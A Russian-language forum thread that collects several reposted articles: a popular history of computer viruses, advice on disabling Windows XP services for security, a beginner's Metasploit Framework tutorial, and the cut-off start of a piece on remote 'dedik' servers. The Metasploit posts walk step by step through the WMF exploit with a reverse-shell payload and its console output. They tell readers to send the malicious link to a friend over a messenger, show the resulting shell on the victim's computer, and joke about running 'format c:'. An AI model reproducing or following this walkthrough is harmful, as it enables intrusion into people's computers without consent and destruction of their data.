Объявление

Свернуть
Пока нет объявлений.

Разные статьи.

Свернуть
X
 
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

  • #61
    Как появились компьютерные вирусы

    Согласно теории эволюции, одними из первых биологических организмов, появившихся на нашей планете, были вирусы. Компьютерные вирусы, получившие свое название благодаря способности самостоятельно распространяться по электронным сетям и, размножаясь, наносить вред вычислительным системам, также возникли на заре развития компьютерных технологий. И если проследить историю зарождения белковых вирусов с большой долей достоверности сейчас уже не представляется возможным, ответить на вопрос, кто именно и зачем придумал компьютерные вирусы, относительно несложно. Как говорится, история не забывает своих героев. Вполне естественно, что многомиллионная армия пользователей персональных компьютеров должна помнить тех людей, благодаря которым появилось на свет такое известное сегодня каждому школьнику понятие, как компьютерный вирус.

    Автором идеи, благодаря которой значительно позже возникла технология создания программных вирусов, принято считать американского программиста Боба Томаса. В 1971 году вычислительная лаборатория компании Bolt, Beranek and Newman, в которой работал Томас, получила заказ на разработку распределенного программного комплекса для авиадиспетчерских служб, управляющих движением пассажирских самолетов. Согласно требованиям заказчиков, входящие в комплекс программы должны были автоматически передавать управление курсом самолетов с одного компьютера на другой по вычислительной сети, отображая на экранах всех подключенных к этой сети компьютеров постоянно изменяющуюся информацию о текущем положении авиалайнеров в воздухе. Экспериментируя с системами передачи данных между различными вычислительными машинами, Томас написал программу, которую назвал «Ползуном». «Ползун» самостоятельно копировал себя с одного компьютера на другой, перемещаясь таким образом по сети, и выводил на экран каждого терминала следующее сообщение: «Я — Ползун! Если сможешь, поймай меня!». Эта небольшая программа не размножалась, а просто «ползала» с одного сетевого узла на другой, развлекая пользователей и системных администраторов. Когда другие программисты узнали об изобретении Томаса, они принялись создавать аналогичные программы, демонстрировавшие на экранах коллег по лаборатории различные забавные фразы. Когда кому-то из специалистов Bolt, Beranek and Newman надоело бороться с бесконечно отвлекающими его от работы «Ползунами», он написал другую программу, которая в точности так же самостоятельно перемещалась по сети, но с совершенно иной целью: она вылавливала и безжалостно уничтожала всех «Ползунов», которые попадались ей на пути. Задетые за живое разработчики «Ползунов» не отставали: усовершенствовав исходный код, они научили свои программы прятаться от «убийцы» в недрах операционной системы, маскируясь под ее компоненты и необходимые для нормальной работы компьютера библиотеки. Кровавая борьба между «Ползунами» и «Киллерами» продолжалась несколько месяцев, после чего это увлечение утратило свою новизну и было заброшено, так и не получив сколь либо серьезного развития.

    Однако идея Боба Томаса не была забыта. В 1975 году американский писатель-фантаст Джон Браннер выпустил фантастический роман «Оседлавший Взрывную Волну», в основу которого легла несколько видоизмененная история с «Ползунами». Книга рассказывала о компьютеризированном обществе, которым управляло с помощью глобальной электронной сети правительство диктаторов и тиранов. Программист, решивший спасти мир от диктатуры, написал программу, которую автор романа назвал «глистом»; эта программа копировала себя с одного компьютера на другой, разрушая хранившуюся в них информацию. Чтобы остановить «глиста», правительство вынуждено было отключить сеть, лишившись таким образом власти. Роман быстро стал бестселлером, сделавшись поистине культовой книгой в только зарождавшейся тогда среде компьютерных хакеров. Именно благодаря этому роману в 1980 году двое сотрудников компании Xerox, которая в те времена выпускала пользовавшиеся большой популярностью персональные компьютеры, имеющие возможность объединения в локальные сети, решили создать программу, которую по аналогии с упоминавшимся в романе Браннера детищем программиста-бунтаря назвали «Червем». Собственно, «Червь» Иона Хеппа и Джона Шока должен был нести положительную миссию: по замыслу разработчиков, перемещаясь между подключенными к сети компьютерами, «Червь» был призван проверять операционную систему на наличие скрытых дефектов и по возможности устранять их. Хепп и Шок задумали еще два варианта «Червя»: один из них предназначался для распространения объявлений, которые администратор мог направлять всем пользователям вычислительной сети, второй позволил бы гибко перераспределять ресурсы между различными объединенными в сеть компьютерами. Однако на практике все получилось совсем не так, как задумали разработчики. Запустив вечером экспериментальную версию «Червя», Хепп и Шок отправились домой. Когда утром программисты вернулись на работу, они увидели, что все компьютеры, установленные в многоэтажном здании исследовательского центра Xerox, расположенного в городке Паоло-Альто, благополучно зависли. В исходном коде «Червя» была допущена незначительная ошибка, благодаря которой программа начала бесконтрольно распространяться между различными узлами сети и блокировать их работу. Перезагрузка машин не помогала: часть входящих в сеть компьютеров была установлена в закрытых комнатах, к которым Хепп и Шок не имели доступа, и как только на перезагружаемой машине запускалась операционная система, «Червь» тут же копировал себя в ее память с другого компьютера, после чего система мгновенно выходила из строя. Отключив одну из машин от локальной сети, программисты вынуждены были экстренно создать другую программу, которая уничтожила бы взбесившегося «Червя». На полную ликвидацию последствий их совместного творчества ушло несколько дней.

    Ведущий программист компании Bell Labs Боб Морриссон по признаниям коллег был лучшим специалистом в своей области, к нему часто обращались за всевозможными консультациями, в частности — в сфере безопасности компьютерных систем. Морриссон был немногословен, но нередко доказывал оппонентам свою правоту на практике. Однажды сотрудники отдела, в котором трудился Боб, несколько месяцев подряд работали над совершенствованием системы безопасности эксплуатируемой ими компьютерной сети, изобретая все новые и новые программные модули. Когда работа была закончена, они похвастались Бобу, что теперь эта сеть защищена от возможных сбоев на все сто процентов. Пожав плечами, Морриссон молча выбросил горящий окурок в стоящее поблизости мусорное ведро с бумагами, содержимое ведра мгновенно загорелось, сработала противопожарная сигнализация и льющаяся из вмонтированных в потолок лаборатории труб вода за две секунды привела всю вычислительную систему в нерабочее состояние. Тогда, в конце восьмидесятых годов, среди программистов была очень популярна игра под названием Core Wars. Игра имела встроенный язык программирования, от игрока требовалось написать на этом языке специальную «боевую программу». Предназначение такой программы было простым: уничтожить аналогичные программы соперников, отыскивая слабые места в их коде. Побеждал тот программист, чье творение продолжало работать, когда все остальные программы были повреждены или разрушены. Виртуальные баталии «боевых программ» на несколько месяцев стали «коньком» программистов из Bell Labs; это продолжалось до тех пор, пока за дело не взялся Боб Морриссон. Его «боевая программа» оказалась непобедимой: код состоял всего лишь из 30 строк, однако этот крошечный файл не просто атаковал соперников: он анализировал методы их защиты и, соответствующим образом видоизменяясь, уничтожал файл противника «изнутри», выбирая стратегию атаки исходя из его логической структуры. После этого игра Core Wars утратила всякий смысл: изобретенный Морриссоном «полиморф» не оставлял конкурентам ни одного шанса. Вскоре Боб Морриссон оставил работу в Bell и получил должность эксперта по компьютерной защите в Национальном Агентстве Безопасности США — единственной в Америке организации, занимавшейся расследованием компьютерных преступлений.

    Старший сын Боба Морриссона Роберт рос тихим и скромным мальчиком, его единственной страстью были компьютеры. Уже в четырнадцатилетнем возрасте он переписал популярную у подростков компьютерную игру The Four Corners, добавив в нее множество новых функциональных возможностей, в 16 лет он стал настоящим экспертом по системе безопасности UNIX, обнаружив в «классическом» берклиевском коде этой платформы множество ошибок, которые не замедлил исправить. Однако он и сам не брезговал пользоваться обнаруженными «дырами» в защите, время от времени подключаясь к удаленным электронным сетям в поисках интересующей его информации. Это увлечение привело к тому, что вскоре в компьютерном журнале Smitsonian появился материал, в котором Роберта называли одним из наиболее известных молодых хакеров в Америке. Именно Роберт Морриссон является автором и разработчиком одной из наиболее известных реализаций протокола передачи данных UUCP — Unix-To-Unix CoPy. Обучаясь на четвертом курсе Гарвардского университета, Роберт уже читал лекции в Национальном Агенстве Безопасности США и исследовательских лабораториях военно-морского флота по безопасности операционной системы UNIX.
    Полученные Робертом в ходе его самостоятельных разработок и изучения уже существующего опыта других программистов знания требовали практического применения. В качестве эксперимента Роберт решил написать программу, которая, используя обнаруженные им недоработки в созданном для UNIX протоколе FTP и программе sendmail могла бы самостоятельно распространяться между объединенными в сеть компьютерами, подобно «Червю» Хеппа и Шока, но при этом умела бы эффективно «прятаться» в операционной системе и самостоятельно размножаться. Иными словами, «Червь» Морриссона должен был объединять в себе все достоинства предыдущих попыток создания аналогичных программ. Поскольку эта разработка была всего лишь научным экспериментом, тестом на безопасность объединенных в сети компьютерных систем, Роберт заложил в код «Червя» алгоритмы, сдерживающие его распространение, никаких модулей, разрушающих файловую систему атакованных компьютеров, также задумано не было. 2 ноября 1988 года в 18.30 Роберт Морриссон подключился к компьютерам лаборатории искусственного интеллекта MIT и запустил свою программу на исполнение. Когда спустя полчаса он снова попытался подключиться к сети, чтобы проверить ход эксперимента, удаленный компьютер не ответил: благодаря закравшейся в исходный код ошибке «Червь» начал бесконтрольно размножаться, блокируя нормальную работу вычислительных систем, и вскоре вырвался из локальной сети MIT на просторы Интернета.

    Комментарий


    • #62
      Программа Морриссона-младшего стала настоящим бедствием для США, в течение нескольких дней функционирование Интернета было парализовано практически полностью. Именно тогда за способность к быстрому распространению и заражению все новых и новых узлов сети журналисты впервые окрестили творение Роберта «вирусом». По различным подсчетам эпидемия поразила порядка 6000 компьютеров — около 10% всех работавших тогда в Интернете вычислительных машин, нанесенный вирусом ущерб оценивался от скромной цифры в 150 000 до значительной суммы в 75 миллионов долларов США. Вскоре к делу подключилось ФБР, однако расследование длилось недолго: Морриссон сам признался в содеянном. Пресса раздула скандал до неимоверного масштаба, особую пикантность ситуации придавал тот факт, что отец Роберта Морриссона — Боб Морриссон был одним из ведущих экспертов отдела Агентства Национальной Безопасности, занимавшегося расследованием компьютерных преступлений.

      Судебное дело Роберта Морриссона было одним из первых дел по обвинению в совершении компьютерного преступления в США, до этого по данной статье под суд попал лишь известный во всем мире хакер Кевин Митник. Морриссона признали виновным и приговорили к выплате штрафа в размере 10 000 долларов и 400 часам исправительных работ. Однако слава Роберта Морриссона, получившего широкую известность благодаря созданному им вирусу, до сих пор не дает покоя сотням и тысячам хакеров на разных континентах. Последней попыткой переплюнуть создателя первого в истории человечества вируса «массового поражения» была небезызвестная программа «Мелисса», уничтожившая в общей сложности более 30 000 компьютеров. С тех пор сотням и тысячам амбициозных молодых людей, разбирающихся в программировании, рано или поздно приходит в голову попробовать свои силы в создании программы, которая, распространяясь по сети, могла бы дестабилизировать работу различных вычислительных систем. Именно их стремление к дешевой славе приносит теперь множество бессонных ночей, проведенных пользователями за восстановлением разрушенных систем, и значительную прибыль компаниям, занимающимся разработкой антивирусных программ.

      Комментарий


      • #63
        Как повысить защищенность компьютера, отключив 10 служб Windows XP

        Если на компьютере установлена операционная система Microsoft Windows XP, есть смысл отключить службы, описанные ниже. Удивительно – что только ни функционирует в операционной системе без ведома пользователя.

        Служба IIS
        Служба Microsoft Internet Information Services дает возможность использовать компьютер в качестве веб-сервера.

        Служба NetMeeting Remote Desktop Sharing
        NetMeeting – это, прежде всего, клиент Microsoft Windows для голосовой IP-телефонии и видеоконференц-связи, но эта конкретная служба также обеспечивает удаленный доступ к рабочему столу.

        Служба Remote Desktop Help Session Manager
        Эту службу использует функция Удаленной Помощи, которая позволяет удаленным пользователям получить доступ в систему для оказания помощи в решении проблем.

        Служба удаленного управления реестром
        С точки зрения безопасности, возможности, которые предоставляет служба удаленного управления реестром, выглядят просто пугающе. Эта служба позволяет удаленным пользователям (теоретически и только при определенных обстоятельствах) редактировать Реестр Windows.

        Маршрутизация и удаленный доступ
        Эта служба предлагает целый ряд возможностей, которые, по идее, должны предоставляться отдельно – наверняка, большинство системных администраторов со мной согласятся. В любом случае, для обычной настольной системы, такой, как Microsoft Windows XP, эти возможности чаще всего не нужны, поэтому даже удобно, что все их можно отключить в виде единой службы. Маршрутизация и удаленный доступ к сети дают возможность использовать систему в качестве маршрутизатора и устройства NAT, как шлюз для доступа к Интернет по модемному соединению и как сервер VPN.

        Служба простого общего доступа к файлам
        Если компьютер не является частью домена Microsoft Windows, файловая система настроена по умолчанию на обеспечение общего доступа к файлам. В реальности, однако, доступ к файлам можно обеспечивать только определенным авторизованным пользователям. Служба простого общего доступа к файлам, обеспечивающая полный доступ к общим файлам безо всяких исключений, пользователю явно не нужна. Эта служба запущена по умолчанию и в версии Windows XP Professional, и в версии Windows XP Home, причем в последней, к сожалению, она не может быть остановлена. В Windows XP Professional ее можно отключить, открыв Мой компьютер | Сервис | Свойства папки, щелкнув по вкладке «Вид» и сняв флажок напротив пункта «Использовать простой общий доступ к файлам (рекомендуется)» в окошке «Дополнительные параметры».

        Служба обнаружения SSDP
        Эта служба используется для обнаружения в сети устройств UPnP и необходима для функционирования службы Universal Plug and Play Device Host (см. ниже).

        Служба Telnet
        Служба Telnet – старый механизм обеспечения удаленного доступа к компьютеру – в прошлом приобрела печальную известность как средство обеспечения удаленного доступа к командному процессору на серверах UNIX. Сегодня использование Telnet для обеспечения удаленного управления системы UNIX может служить достаточным основанием для увольнения. Вместо нее следует использовать шифрованный протокол, например, SSH.

        Служба Universal Plug and Play Device Host
        Если все устройства Plug and Play уже установлены, эта служба, скорее всего, больше не понадобится.

        Служба Windows Messenger
        Служба Windows Messenger, представленная в списке служб как Messenger, обеспечивает возможность отправлять «сетевые сообщения» и ответственна за функционирование «Обработчика предупреждений». Эта служба никак не связана с клиентом быстрого обмена сообщениями Windows Messenger и необязательна для работы в сети Windows Messenger IM.

        Эти службы запущены и вообще установлены далеко не на всех компьютерах – в зависимости от того, кто устанавливал операционную систему, какая версия ОС установлена (XP Home или XP Professional) и у какого поставщика куплен компьютер (если Windows XP была предустановлена).

        Все описанные службы, за исключением «Службы простого общего доступа к файлам», можно отключить с помощью одного приложения. Достаточно нажать на кнопку «Пуск», выбрать пункт Настройки | Панель управления, открыть папку «Администрирование», а в ней – окно «Службы». Чтобы отключить любую из указанных служб, нужно дважды щелкнуть кнопкой мыши по соответствующему пункту в окне «Службы» и изменить настройки в меню «Тип запуска». Обычно для отключения служб, по соображениям безопасности, рекомендуется выбирать пункт «Отключено». Если есть подозрения, что выбранная служба необходима для функционирования других служб, это можно проверить, открыв вкладку «Зависимости» в диалоге свойств службы.

        Разумеется, это не полный список служб и приложений, которые можно отключить без ущерба для функционирования системы. Это просто те службы, которые, скорее всего, не понадобятся пользователю, а, будучи запущены, делают компьютер уязвимым с точки зрения безопасности. Большинству пользователей ни одна из перечисленных служб после успешной установки операционной системы не понадобится. Многие другие службы также могут быть отключены безо всяких последствий, но, прежде чем их останавливать, рекомендуется изучить общий список служб, чтобы убедиться, что они действительно не нужны. Некоторые из них, например, Удаленный вызов процедур (Remote Procedure Call, RPC), совершенно необходимы для стабильного функционирования системы.

        Любая запущенная, но неиспользуемая служба – источник повышенной уязвимости системы. Если служба не имеет особого значения для авторизованных пользователей компьютера и для нормального функционирования системы, лучше ее отключить.

        Комментарий


        • #64
          Metasploit Framework для новичков

          Metasploit Framework
          (Или как юзать пакет Metasploit Framework для новичков)



          Предисловие.

          Многие слышали наверно слова Метасплоит, метафайлы, эксплоит, шелл, уязвимость. Очень много вопросов возникает у пользователей (начинающих скрипткидисов, а так же тестеров сплоитов и уязвимостей) которые с этим так или иначе сталкиваются, вот как раз для них эта статья. Тут я расскажу Вам что такое проект Metasploit Framework и как им пользоваться. Сразу скажу что статья расчитана для тех кто задаёт вопросы типа этих:

          1.
          cd \
          cd %SystemRoot%\system32
          msfconsole: chdir: failed to change directory No such file or directory
          Это как понимать?

          2. или типа этого:
          + -- --=[ msfconsole v2.6 [145 exploits - 75 payloads]

          msf > ls exploits
          ls: exploits: No such file or directory
          msf >
          А как понимать это?

          1.Основные понятия и термины используемые в статье. (знающие могут пропустить):

          Эксплоит: (англ. exploit — использовать) — это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведёт к повышению привилегий или отказу в обслуживании компьютерной системы.*

          Шелл-код: Код оболочки, шелл-код (англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например '/bin/sh' Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе.*

          Реверс-шелл: При эксплуатации удаленной уязвимости шелл-код может открывать заранее заданый порт TCP уязвимого компьютера, через который будет осуществляться дальнейший доступ к командной оболочке, такой код называется привязывающим к порту (англ. port binding shellcode). Если шелл-код осуществляет подключение к порту компьютера атакующего, что производится с целью обхода брандмауэра или NAT, то такой код называется обратной оболочкой (англ. reverse shell shellcode).

          Уязвимость: В компьютерной безопасности, термин уязвимость (англ.vulnerability) используется для обозначения слабозащищённого или открытого места в системе. Уязвимость может быть результатом ошибок программирования или недостатков в дизайне системы. Уязвимость может существовать либо только теоретически, либо иметь известный эксплойт. Уязвимости часто являются результатом беззаботности программиста, но, также, могут иметь и другие причины. Уязвимость обычно позволяет атакующему обмануть приложение, например,с помощью внедрения данных каким-нибудь незапланированным способом, выполнения команды на системе, на которой выполняется приложение, или путем использования упущения, которое позволяет получить непредусмотренный доступ к памяти для выполнения кода на уровне привилегий программы. Некоторые уязвимости появляются из-за недостаточной проверки данных, вводимых пользователем; часто это позволяет напрямую выполнить команды SQL (SQL-инъекция). Другие уязвимости появляются из-за более сложных проблем, таких как запись данных в буфер, без проверки его границ, в результате буфер может быть переполнен, что может привести к исполнению произвольного кода.

          Cygwi (Цигвин): набор свободных программных инструментов разработанных фирмой Cygnus Solutions, позволяющих превратить Microsoft Windows различных версий в некоторое подобие Unix-системы. Изначально Cygwin задумывался как среда для переноса программ из POSIX-совместимых операционных систем (таких как GNU/Linux, BSD и UNIX) в Windows. Программы, портированные с помощью Cygwin, работают лучше всего в Windows NT, Windows 2000, Windows XP и Windows Server 2003, но в некоторых случаях годятся Windows 95 и Windows 98. В настоящее время проект Cygwin разрабатывается сотрудниками Red Hat и другими программистами. Подобные функциональные возможности предлагает также и Microsoft в своём пакете Services for UNIX, включающем в себя подсистему Interix.*

          Perl (Перл): Язык программирования. Создатель Ларри Уолл (Larry Wall). Само слово Perl — аббревиатура, которая расшифровывается как Practical Extraction and Report Language (практический язык извлечений и отчётов, отчего сначала язык назывался PEARL, но затем буква «A» «потерялась»). Существует также ряд других вариантов. Согласно самому красивому из них, название perl произошло от слова pearl (жемчужина). Талисманом языка Perl является верблюд — не слишком красивое, но очень выносливое животное, способное выполнять тяжелую работу. Основной особенностью языка считаются его богатые возможности для работы с текстом, реализованные при помощи регулярных выражений.*

          (определения взяты из выкипедии)

          2. Что такое Metasploit Framework?

          Metasploit Framework (согласно описанию) это законченная среда для написания, тестирования и использования кода эксплойтов. Эта среда обеспечивает надежную платформу для испытаний на проникновение, разработки шелкодов и исследования уязвимостей". Написан на Perl (с некоторыми частями на ассемблере, Python и C) – отсюда нет привязки к какой либо платформе – будет работать в любой системе, где есть интерпретатор Perl`a (с оговоркой, см. дальше). На данный момент, пакет Metasploit Framework функционирует как на Linux так и на Windows, а так же на Мас. Скачать последнюю версию пакета для соответствующей ОС можно здесь: Penetration Testing Software | Metasploit
          (Среда под Windows базируется на доработанном Cygwin, что удобно, т.к. это дает пользователю извесную консоль. Однако, были некоторые проблемы с поддержкой Active Perl, поэтому поддерживается только Cygwin Perl.

          3. Установка (для win- пользователей)

          Инсталлятор для windows содержит всё необходимое (Сygwin, Perl), т. е. пользователям windows дополнительное ПО скачивать не потребуется.
          Качаем тут: (доступная версия 2.6 для windows на момент написания статьи).
          Тут лежит версия 2.7 Щас она актуальней (больше сплоитов).


          Запускаем инсталлятор: framework-2.6.exe

          Получаем: в C:\Program Files\Metasploit Framework\
          cygwin.bat (41.0B) - запуск cygwin
          msfconsole.bat (86.0B) - запуск консоли MSF
          msfupdate.bat (85.0B) - запуск обновления пакета
          msfweb.bat (82.0B) - запуск WEB-интерфейса пакета
          Metasploit Framework.url (51.0B) - линк на сайт разработчиков
          uninst.exe (47.6KB) - деинсталяция пакета

          а также папки bin, etc, home, lib, sbin, tmp, usr, var - хорошо известные поклонникам Unix-систем.

          4. Использование.

          Пакет Metasploit Framework имеет два варианта работы: msfconsole (консольный) и web- интерфейс msfweb. Мне удобней всегда работать в msfconsole. Это интерфейс командной строки (по типу cmd с минимальным набором команд), имеющий собственное программное окружение и систему команд. Чтоб посмотреть основные команды наберите в консоли help. Для тех у кого туго с английским привожу перевод help`a. Рассмотрим консольный вариант работы пакета.

          msf > help

          Metasploit Framework Main Console Help
          ======================================

          ? ------------ Show the main console help (Показать главное окно помощи)
          cd ----------- Change working directory (Выбрать рабочую директорию)
          exit ---------- Exit the console (Выход из консоли)
          help --------- Show the main console help (Показать главное окно помощи)
          info ---------- Display detailed exploit or payload information (Вывести на дисплей детальную инфу о эксплоите или начинке)
          quit ---------- Exit the console (Выход из консоли)
          reload -------- Reload exploits and payloads (Перезагрузить эксплоит и начинки)
          save --------- Save configuration to disk (Записать конфигурацию на диск)
          setg ---------- Set a global environment variable (Установить глобальную переменную окружения)
          show --------- Show available exploits and payloads (Показать доступные эксплоиты и начинки)
          unsetg ------- Remove a global environment variable (Удалить глобальную переменную окружения)
          use ----------- Select an exploit by name (Выбрать эксплоит по имени для использования)
          version ------- Show console version (Показать версию консоли)
          ----нет в help`е-----
          ls ------------- List the current directory (Показать файлы в текущей директории)
          exploit -------- Run exploit (Запуск эксплоита)
          msf >

          М...да, скажете вы help бедноват и команд мало. Ну ничего, сами догоним что к чему.
          cd [имя_директории]- стандартная команда (как и в cmd, так и в древнем дос - делает то же самое и здесь, с ней всё ясно, для тех кто в танке наберите help cd в консоли cmd)
          Конечно всем не терпится использовать команду use [имя эксплоита], а затем установить переменную PAYLOAD какой либо вкусной начинкой, но всё по порядку, начнём!

          5. Распрастранённые ошибки 90% новичков.
          (продвинутым в режиме командной строки пропустить обязательно! ;-)):

          1 Ошибка.
          Первая команда юзера после загрузки консоли ls exploits
          В этом случае их постигает такой облом:

          msf > ls exploits
          ls: exploits: No such file or directory
          msf >

          И все разом говорят у меня нет эксплоитов!
          А надо сделать всего лишь команду ls без параметров, чтоб посмотреть где мы находимся.

          msf > ls
          framework perl.exe.stackdump run_msfupdate userguide.pdf
          framework.tar run_msfconsole run_msfweb
          msf >

          Вот теперь мы видим, что папки с эксплоитами тут нет, так как она, скорее всего, находится внутри папки framework.
          В чём проблема, переходим в папку framework и посмотрим там:

          msf > cd framework
          msfconsole: chdir: changed to directory framework
          msf >

          Прекрасно! Теперь глянем что тут внутри скомандовав ls:

          msf > ls
          data exploits msfcli msfencode msfpescan nops src
          docs extras msfconsole msflogdump msfupdate payloads tools
          encoders lib msfelfscan msfpayload msfweb sdk
          msf >

          О! Сколько тут всего! И эксплоиты и начинки и доки. Вот теперь можно командовать ls exploits

          msf > ls exploits
          3com_3cdaemon_ftp_overflow.pm mozilla_compareto.pm
          Credits.pm ms05_039_pnp.pm
          -------------много других эксплоитов-------------------
          mercantec_softcart.pm wsftp_server_503_mkd.pm
          mercur_imap_select_overflow.pm wzdftpd_site.pm
          mercury_imap.pm ypops_smtp.pm
          minishare_get_overflow.pm zenworks_desktop_agent.pm
          msf >

          Во! Сколько сплоитов! (А говорили нет эксплоитов. оказывается всё со сплоитами в порядке - они есть)

          2 Ошибка

          Команда use [имя_экплоита.pm]

          msf > use ie_xp_pfv_metafile.pm
          msfconsole: use: please specify a valid exploit name
          msf >

          Расширение эксплоита pm - указывать не надо, только имя сплоита!

          msf > use ie_xp_pfv_metafile
          msf ie_xp_pfv_metafile >

          Комментарий


          • #65
            3 Ошибка

            После удачного выбора нужного сплоита сразу выбирают начинку (забывая про параметры)

            msf > use ie_xp_pfv_metafile
            msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
            PAYLOAD -> win32_reverse
            msf ie_xp_pfv_metafile(win32_reverse) > exploit
            Error: Missing required option: LHOST
            msf ie_xp_pfv_metafile(win32_reverse) >

            Облом! Это что ещё? Перевожу отсутствует (не задана) рекомендованная опция (параметр) LHOST
            Вообщем перед тем как начинять сплоит, я советую задать (установить) все необходимые параметры с помощью команды set.
            У каждого сплоита их может быть разное количество (зависит от конкретной уязвимости)
            Ну и что делать, как узнать какие параметры у какого сплоита? Ответ уже был выше! в help`e! Коммандуем: info [имя_сплоита], например узнаем всё про wmf-сплоит (ie_xp_pfv_metafile)

            msf > info ie_xp_pfv_metafile
            Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Executi
            Class: remote
            Version: $Revision: 1.18 $
            Target OS: win32, winxp, win2003
            Keywords: wmf
            Privileged: No
            Disclosure: Dec 27 2005

            Provided By:
            H D Moore <hdm [at] metasploit.com
            san <san [at] xfocus.org>
            O600KO78RUS[at]unknown.ru

            Available Targets:
            Automatic - Windows XP / Windows 2003 / Windows Vista

            Available Options:

            Exploit: Name Default Description
            -------- -------- ------- --------------------------------------
            optional REALHOST External address to use for redirects
            T)
            optional HTTPHOST 0.0.0.0 The local HTTP listener host
            required HTTPPORT 8080 The local HTTP listener port

            ..........пропущено.............
            msf >

            Вот вам вся и подробная инфа о сплоите, нас интересует optional
            Для ленивых:
            HTTPHOST (LHOST) - Локальный IP адрес сервера на котором повиснет сплоит (адрес твоего компа)
            HTTPORT (LPORT) - его порт (8080 - по умолчанию)
            REALHOST (RHOST) - внешний адрес для редиректа (WAN - адрес если твой комп находится за NAT)

            4. Ошибка
            Важно! Всегда и везде имена переменных окружения писать только ЗАГЛАВНЫМИ буквами!

            5. Ошибка
            >msf ie_xp_pfv_metafile(win32_reverse) > exploit
            msf >Could not start listener: Operation not permitted
            Что делать? - освободить порт (уже занят чем то, буквально - немогу запустить слущатель:операция не разрешена) или использовать другой, например set LPORT 8081

            6 Ошибка
            Client connected from ххх.ххх.ххх.ххх:1879...
            Undefined subroutine &Pex::Utils::JSUnescape called at /home/framework/exploits/
            ie_vml_rectfill.pm line 156.
            Exiting Reverse Handler.
            msf ie_vml_rectfill(win32_reverse) >
            Это ещё что? Неопределённая подпрограмма и ... ну вообщем скорее всего вы скачали свежий сплоит и засунули в старую версию пакета, вообщем работать не будет. Cплоиты которые вышли после пакета в большинстве своём будут работать только на свежей версии, на данный момент 2.7 (как раз касается свежего сплоита ie_vml_rectfill.pm. Так что или обновляйте пакет, либо качайте последний...

            6. Пример
            (практическое использование).
            Эксплоит: ie_xp_pfv_metafile, начинка win32_reverse

            msf > use ie_xp_pfv_metafile
            msf ie_xp_pfv_metafile > set LHOST 10.0.0.1
            LHOST -> 10.0.0.1

            Вообщем разобрались задали всё необходимое для сплоита, теперь можно переходить к начинке:
            командуем set PAYLOAD [имя_начинки],

            msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
            PAYLOAD -> win32_reverse
            msf ie_xp_pfv_metafile(win32_reverse) >msf ie_xp_pfv_metafile(win32_reverse) > exploit[*] Starting Reverse Handler.[*] Waiting for connections to http://10.0.0.1:8080/

            Готово! Консоль говорит, что жду соединений к http://10.0.0.1:8080/
            Впариваем ссылку другу (или подружке) например через асю..

            Маша, смотри какой прикол: http://10.0.0.1:8080/ (прим. вообще-то тут должен быть внешний ip)

            Юзвер заходи по ссылке (и если у него есть эта конкретная уязвимость в IE) в консоли мы должны увидеть вот что:[*] HTTP Client connected from 10.0.0.2:1116, redirecting... - клиент соединился, его IP 10.0.0.2:1116, редирект[*] HTTP Client connected from 10.0.0.2:1117, sending 1604 bytes of payload... - отправлено 1604 байт начинки (реверс-шелл тут)[*] Got connection from 10.0.0.1:4321 <-> 10.0.0.2:1118 - установлено соединение (пайп с cmd удалённого компа)
            Microsoft Windows XP ['?абЁп 5.1.2600]
            (') ?RаЇRа жЁп ? cЄаRбRдв, 1985-2001.
            C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>

            О блин!, Это ещё что, скажете Вы - это командная строка удалённого компа того юзверя!
            А что за абракадабра? - Это не та кодовая страница выбрана (у него русская винда стоит!) Щас проверим! chcp

            C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp
            chcp
            '?Єгй п ЄR¤Rў п бва -Ёж : 866
            C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>

            Точно это 866, поставим 1251 (виндовую, а не дос)

            C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp 1251
            chcp 1251
            '?Єгй п ЄR¤Rў п бва -Ёж : 1251
            C:\Documents and Settings\Администратор\Рабочий стол>

            О! Теперь всё по русски! Что делать в cmd чужого компа зависит от вашей фантазии, список команд смотрите в help по консольным командам windows. (format c: - жесть!)
            Был разобран конкретный пример использования WMF-Эксплоита с начинкой реверс-шелла, ваши варианты могут быть другими.

            Заключение.

            Ссылки:
            Инфа по старой версии пакета 2.0 (сентябрь 2004г)
            Metasploit Framework (Часть первая из трех). Прометей Эксплойтирования | информационный портал по безопасности - обзорная статья по Metasploit Framework
            Metasploit Framework, часть вторая. | информационный портал по безопасности - использование пакета
            Metasploit Framework, часть третья. | информационный портал по безопасности - про ещё один интерфейс пакета
            Хакер, номер #086, стр. 086-066-1, WMF: баг года - статьи в журнале хакер про WMF-баг*
            Хакер, номер #086, стр. 086-074-1, Метавеселье на практике
            Форум АНТИЧАТ - WMF-баг Windows эксплуатация - "WMF баг - windows эксплуатация" - моя статья, породившая кучу вопросов типа как юзать Metasploit.

            ТУТ http://video.antichat.ru/file226.html Лежит видео по использованию пакета 2.7. В видео показываем как мы взламываем систему друга, чтоб поглумиться над ним, обнаруживаем у него признаки наличия трояна Смерть Ламера, проникаемся к нему сочувствием и избавляем его от троя удалённо (сносим файл сервера троя антивирусом касперского, но этого мало, трой снова себя восстанавливает - он есть в процессах, находим подозрительно-левый процесс и пытаемся его удалённо убить - получается только с третьего раза с параметром "принудительно", затем находим автозагружаемый файл сервера трояна и тоже убиваем его антивирем).

            Комментарий


            • #66
              Моя небольшая статейка по дедикам

              Начало начал


              Прежде всего, нам необходимо узнать что такое дедик. Дедик (дэд, дед) - выделенный управляемый сервер, данное его называние пошло от английского dedicated - выделенный. Для подключения к нему обычно используется программа "Подключение к удаленному рабочему столу" (однако, иногда могут использоваться и другие программы, например RAdmin). Для запуска - Пуск-Выполнить-"mstsc.exe"-OK. Данная программа позволяет подключаться к серверу и управлять им. На сервере будут работать все сочетания клавиш (за исключением CTRL+ALT+DEL). Однако, прокси она не поддерживает. Этот момент мы рассмотрим подробнее.

              Прокси


